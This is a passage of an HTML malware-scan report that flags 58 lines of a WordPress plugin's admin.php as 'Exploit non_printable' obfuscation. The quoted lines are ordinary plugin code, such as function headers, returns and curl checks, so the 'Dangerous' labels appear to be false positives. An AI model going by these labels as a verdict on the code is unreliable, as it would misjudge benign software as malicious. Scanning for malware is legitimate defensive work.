style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">phpzipincs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qfunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">schallfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">tempfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">userfu</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_372").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 27.02 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 58</span><br><table id="file_373" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">; } if (</span><span style="color: #0000BB">is_admin</span><span style="color: #007700">()){ </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">(</span><span style="color: #DD0000">'clean_url'</span><span style="color: #007700">, </span><span style="color: #DD0000">'UAVC_product_license_redirect_to_modal_popup'</span><span style="color: #007700">, </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">3</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 124</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$link</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_admin_scripts_updater</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_update_option'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$request</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">update_option</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_options'</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_dismiss_notice'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_dismiss_notice</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_brainstorm_menu</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_get_free_menu_position'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_core_check'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_check</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_opn</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_icon_manager_menu</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_modules</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 388</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_dashboard</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 392</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_about</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 396</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_smoothscroll</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_get_option'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_scripts_styles</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">product_license</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 408</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_debug_settings</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'bsf_core_admin_notice'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_resources</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_google_maps_dashboard</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_admin_notice</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_modules</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">can_access_admin</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$user_role</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 461</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 464</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_debug_settings</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$request </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 566</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_settings</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">response</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_css_options</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 620</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_notice</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 723</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_generate_rand_id</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$myKeeper</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">wp_remote_get</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 734</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_remote_get</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'curl_init'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 743</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the transfer </span><span style="color: #007700">as </span><span style="color: #0000BB">a string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_bsf_core_style_hooks</span><span style="color: #007700">(</span><span style="color: #0000BB">$hooks</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_bsf_core_frosty_hooks</span><span style="color: #007700">(</span><span style="color: #0000BB">$hooks</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">UAVC_product_license_redirect_to_modal_popup</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$original_url</span><span style="color: #007700">, </span><span style="color: #0000BB">$_context</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 797</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bsf_registration_page_url</span><span style="color: #007700">( </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">'6892199' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 93</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">debug_link</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (isset(</span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[</span><span style="color: #0000BB">$request</span><span style="color: #007700">])) ? </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[</span><span style="color: #0000BB">$request</span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
